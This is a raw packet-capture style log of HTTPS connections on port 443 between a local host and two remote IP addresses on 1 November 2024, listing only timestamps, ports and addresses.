Nov 1, 2024 10:51:06.081795931 CET	443	49787	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:06.207972050 CET	443	49787	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:06.208031893 CET	443	49787	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:06.208121061 CET	49787	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:06.208276987 CET	49787	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:06.208292007 CET	443	49787	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:06.208324909 CET	49787	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:06.208328962 CET	443	49787	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:06.211013079 CET	49792	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:06.211038113 CET	443	49792	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:06.211112976 CET	49792	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:06.211275101 CET	49792	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:06.211287022 CET	443	49792	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:06.439706087 CET	443	49777	104.21.85.194	192.168.2.4
Nov 1, 2024 10:51:06.439822912 CET	443	49777	104.21.85.194	192.168.2.4
Nov 1, 2024 10:51:06.439960957 CET	49777	443	192.168.2.4	104.21.85.194
Nov 1, 2024 10:51:06.440053940 CET	49777	443	192.168.2.4	104.21.85.194
Nov 1, 2024 10:51:06.440059900 CET	443	49777	104.21.85.194	192.168.2.4
Nov 1, 2024 10:51:06.444446087 CET	49793	443	192.168.2.4	104.21.85.194
Nov 1, 2024 10:51:06.444466114 CET	443	49793	104.21.85.194	192.168.2.4
Nov 1, 2024 10:51:06.444564104 CET	49793	443	192.168.2.4	104.21.85.194
Nov 1, 2024 10:51:06.444844007 CET	49793	443	192.168.2.4	104.21.85.194
Nov 1, 2024 10:51:06.444854975 CET	443	49793	104.21.85.194	192.168.2.4
Nov 1, 2024 10:51:06.488044024 CET	443	49788	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:06.488858938 CET	49788	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:06.488871098 CET	443	49788	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:06.489587069 CET	49788	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:06.489590883 CET	443	49788	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:06.566510916 CET	443	49791	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:06.567050934 CET	49791	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:06.567109108 CET	443	49791	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:06.567500114 CET	49791	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:06.567513943 CET	443	49791	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:06.568624973 CET	443	49789	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:06.569027901 CET	49789	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:06.569035053 CET	443	49789	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:06.569444895 CET	49789	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:06.569448948 CET	443	49789	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:06.578022003 CET	443	49790	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:06.578466892 CET	49790	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:06.578474998 CET	443	49790	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:06.579080105 CET	49790	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:06.579083920 CET	443	49790	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:06.622977018 CET	443	49788	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:06.623054028 CET	443	49788	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:06.623104095 CET	49788	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:06.623214006 CET	49788	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:06.623219967 CET	443	49788	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:06.623229027 CET	49788	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:06.623233080 CET	443	49788	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:06.625684023 CET	49794	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:06.625696898 CET	443	49794	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:06.625773907 CET	49794	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:06.625925064 CET	49794	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:06.625933886 CET	443	49794	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:06.708398104 CET	443	49790	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:06.708749056 CET	443	49790	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:06.708800077 CET	49790	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:06.708885908 CET	49790	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:06.708890915 CET	443	49790	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:06.708925009 CET	49790	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:06.708929062 CET	443	49790	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:06.710752964 CET	49795	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:06.710782051 CET	443	49795	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:06.710840940 CET	49795	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:06.710957050 CET	49795	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:06.710969925 CET	443	49795	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:06.873142004 CET	443	49789	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:06.873212099 CET	443	49789	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:06.873265028 CET	49789	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:06.873378992 CET	49789	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:06.873394966 CET	443	49789	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:06.873409033 CET	49789	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:06.873415947 CET	443	49789	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:06.875721931 CET	49796	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:06.875734091 CET	443	49796	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:06.875814915 CET	49796	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:06.875952959 CET	49796	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:06.875961065 CET	443	49796	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:06.933717966 CET	443	49791	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:06.934885979 CET	443	49791	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:06.934946060 CET	49791	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:06.934971094 CET	49791	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:06.934976101 CET	443	49791	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:06.934988976 CET	49791	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:06.934993982 CET	443	49791	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:06.936630011 CET	49797	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:06.936647892 CET	443	49797	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:06.936713934 CET	49797	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:06.936811924 CET	49797	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:06.936825037 CET	443	49797	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:06.938798904 CET	443	49792	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:06.939088106 CET	49792	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:06.939115047 CET	443	49792	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:06.939495087 CET	49792	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:06.939498901 CET	443	49792	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:07.061211109 CET	443	49793	104.21.85.194	192.168.2.4
Nov 1, 2024 10:51:07.061290979 CET	49793	443	192.168.2.4	104.21.85.194
Nov 1, 2024 10:51:07.062340021 CET	49793	443	192.168.2.4	104.21.85.194
Nov 1, 2024 10:51:07.062349081 CET	443	49793	104.21.85.194	192.168.2.4
Nov 1, 2024 10:51:07.062671900 CET	443	49793	104.21.85.194	192.168.2.4
Nov 1, 2024 10:51:07.063790083 CET	49793	443	192.168.2.4	104.21.85.194
Nov 1, 2024 10:51:07.063822985 CET	49793	443	192.168.2.4	104.21.85.194
Nov 1, 2024 10:51:07.063870907 CET	443	49793	104.21.85.194	192.168.2.4
Nov 1, 2024 10:51:07.067894936 CET	443	49792	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:07.067953110 CET	443	49792	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:07.068001032 CET	49792	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:07.068092108 CET	49792	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:07.068099976 CET	443	49792	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:07.068110943 CET	49792	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:07.068114996 CET	443	49792	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:07.069839954 CET	49798	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:07.069861889 CET	443	49798	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:07.069933891 CET	49798	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:07.070038080 CET	49798	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:07.070049047 CET	443	49798	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:07.354877949 CET	443	49794	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:07.355344057 CET	49794	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:07.355354071 CET	443	49794	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:07.355772018 CET	49794	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:07.355775118 CET	443	49794	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:07.427556992 CET	443	49795	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:07.427880049 CET	49795	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:07.427895069 CET	443	49795	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:07.428246021 CET	49795	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:07.428251028 CET	443	49795	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:07.483484030 CET	443	49794	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:07.483839989 CET	443	49794	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:07.484019041 CET	49794	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:07.484019041 CET	49794	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:07.484019041 CET	49794	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:07.486263037 CET	49799	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:07.486289024 CET	443	49799	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:07.486371994 CET	49799	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:07.486498117 CET	49799	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:07.486510038 CET	443	49799	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:07.534974098 CET	443	49793	104.21.85.194	192.168.2.4
Nov 1, 2024 10:51:07.535080910 CET	443	49793	104.21.85.194	192.168.2.4
Nov 1, 2024 10:51:07.535126925 CET	49793	443	192.168.2.4	104.21.85.194
Nov 1, 2024 10:51:07.535291910 CET	49793	443	192.168.2.4	104.21.85.194
Nov 1, 2024 10:51:07.535300970 CET	443	49793	104.21.85.194	192.168.2.4
Nov 1, 2024 10:51:07.535317898 CET	49793	443	192.168.2.4	104.21.85.194
Nov 1, 2024 10:51:07.535321951 CET	443	49793	104.21.85.194	192.168.2.4
Nov 1, 2024 10:51:07.553823948 CET	443	49795	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:07.554160118 CET	443	49795	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:07.554215908 CET	49795	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:07.554929972 CET	49795	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:07.554946899 CET	443	49795	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:07.554955959 CET	49795	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:07.554960966 CET	443	49795	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:07.565049887 CET	49800	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:07.565076113 CET	443	49800	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:07.565150976 CET	49800	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:07.565417051 CET	49800	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:07.565431118 CET	443	49800	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:07.604357004 CET	443	49796	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:07.604711056 CET	49796	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:07.604729891 CET	443	49796	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:07.605186939 CET	49796	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:07.605190992 CET	443	49796	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:07.655744076 CET	443	49797	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:07.656040907 CET	49797	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:07.656052113 CET	443	49797	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:07.656415939 CET	49797	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:07.656420946 CET	443	49797	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:07.706535101 CET	49794	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:07.706542969 CET	443	49794	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:07.733998060 CET	443	49796	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:07.734198093 CET	443	49796	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:07.734242916 CET	49796	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:07.734345913 CET	49796	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:07.734354019 CET	443	49796	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:07.734364033 CET	49796	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:07.734369040 CET	443	49796	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:07.740437984 CET	49801	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:07.740466118 CET	443	49801	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:07.740542889 CET	49801	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:07.740885973 CET	49801	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:07.740902901 CET	443	49801	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:07.783222914 CET	443	49797	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:07.783440113 CET	443	49797	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:07.783502102 CET	49797	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:07.783530951 CET	49797	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:07.783538103 CET	443	49797	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:07.783555031 CET	49797	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:07.783559084 CET	443	49797	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:07.785451889 CET	49802	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:07.785475016 CET	443	49802	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:07.785547972 CET	49802	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:07.785675049 CET	49802	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:07.785686970 CET	443	49802	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:07.810795069 CET	443	49798	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:07.811096907 CET	49798	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:07.811105013 CET	443	49798	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:07.811499119 CET	49798	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:07.811501980 CET	443	49798	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:07.941951036 CET	443	49798	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:07.942276001 CET	443	49798	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:07.942337990 CET	49798	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:07.942373991 CET	49798	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:07.942378998 CET	443	49798	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:07.942387104 CET	49798	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:07.942389965 CET	443	49798	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:07.944668055 CET	49803	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:07.944694996 CET	443	49803	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:07.944760084 CET	49803	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:07.944889069 CET	49803	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:07.944902897 CET	443	49803	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:08.214723110 CET	443	49799	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:08.217585087 CET	49799	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:08.217601061 CET	443	49799	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:08.218020916 CET	49799	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:08.218025923 CET	443	49799	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:08.306236982 CET	443	49800	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:08.308208942 CET	49800	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:08.308221102 CET	443	49800	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:08.308649063 CET	49800	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:08.308655024 CET	443	49800	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:08.355968952 CET	443	49799	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:08.356074095 CET	443	49799	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:08.356146097 CET	49799	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:08.356297970 CET	49799	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:08.356311083 CET	443	49799	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:08.356321096 CET	49799	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:08.356324911 CET	443	49799	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:08.358555079 CET	49804	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:08.358576059 CET	443	49804	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:08.358654976 CET	49804	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:08.358778000 CET	49804	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:08.358788013 CET	443	49804	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:08.437345028 CET	443	49800	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:08.437583923 CET	443	49800	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:08.437655926 CET	49800	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:08.437768936 CET	49800	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:08.437779903 CET	443	49800	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:08.437788963 CET	49800	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:08.437793016 CET	443	49800	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:08.440007925 CET	49805	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:08.440041065 CET	443	49805	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:08.440115929 CET	49805	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:08.440218925 CET	49805	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:08.440228939 CET	443	49805	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:08.470127106 CET	443	49801	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:08.473520994 CET	49801	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:08.473530054 CET	443	49801	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:08.473910093 CET	49801	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:08.473917961 CET	443	49801	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:08.513186932 CET	443	49802	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:08.513485909 CET	49802	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:08.513503075 CET	443	49802	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:08.513855934 CET	49802	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:08.513859034 CET	443	49802	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:08.642369986 CET	443	49802	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:08.642750025 CET	443	49802	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:08.642806053 CET	49802	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:08.642832041 CET	49802	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:08.642842054 CET	443	49802	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:08.642849922 CET	49802	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:08.642853975 CET	443	49802	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:08.645226955 CET	49806	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:08.645242929 CET	443	49806	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:08.645320892 CET	49806	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:08.645464897 CET	49806	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:08.645474911 CET	443	49806	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:08.678277016 CET	443	49801	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:08.678442955 CET	443	49801	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:08.678682089 CET	49801	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:08.678759098 CET	49801	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:08.678774118 CET	443	49801	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:08.678803921 CET	49801	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:08.678812981 CET	443	49801	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:08.680740118 CET	49807	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:08.680775881 CET	443	49807	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:08.680849075 CET	49807	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:08.680946112 CET	49807	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:08.680963039 CET	443	49807	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:08.681581974 CET	443	49803	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:08.681884050 CET	49803	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:08.681891918 CET	443	49803	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:08.682286978 CET	49803	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:08.682291985 CET	443	49803	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:08.815191984 CET	443	49803	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:08.816288948 CET	443	49803	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:08.816359997 CET	49803	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:08.819281101 CET	49803	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:08.819281101 CET	49803	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:08.819294930 CET	443	49803	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:08.819302082 CET	443	49803	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:08.820985079 CET	49808	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:08.821002007 CET	443	49808	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:08.821207047 CET	49808	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:08.821347952 CET	49808	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:08.821352959 CET	443	49808	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:09.259720087 CET	443	49805	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:09.260354042 CET	443	49804	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:09.261643887 CET	49805	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:09.261662960 CET	443	49805	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:09.261816025 CET	49804	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:09.261831045 CET	443	49804	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:09.262104034 CET	49805	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:09.262109041 CET	443	49805	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:09.262262106 CET	49804	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:09.262267113 CET	443	49804	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:09.377998114 CET	443	49806	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:09.378803015 CET	49806	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:09.378812075 CET	443	49806	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:09.379223108 CET	49806	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:09.379226923 CET	443	49806	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:09.387698889 CET	443	49805	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:09.388195992 CET	443	49805	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:09.388243914 CET	49805	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:09.388266087 CET	49805	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:09.388279915 CET	443	49805	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:09.388288021 CET	49805	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:09.388293028 CET	443	49805	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:09.390285015 CET	443	49804	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:09.390918970 CET	443	49804	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:09.390989065 CET	49804	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:09.391011953 CET	49809	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:09.391031981 CET	49804	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:09.391040087 CET	443	49809	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:09.391041994 CET	443	49804	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:09.391053915 CET	49804	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:09.391057968 CET	443	49804	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:09.391119003 CET	49809	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:09.391267061 CET	49809	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:09.391278982 CET	443	49809	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:09.392920971 CET	49810	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:09.392947912 CET	443	49810	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:09.393008947 CET	49810	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:09.393112898 CET	49810	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:09.393125057 CET	443	49810	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:09.413434982 CET	443	49807	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:09.413918018 CET	49807	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:09.413933992 CET	443	49807	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:09.414330959 CET	49807	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:09.414335966 CET	443	49807	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:09.508316994 CET	443	49806	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:09.508372068 CET	443	49806	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:09.508415937 CET	49806	443	192.168.2.4	13.107.246.45
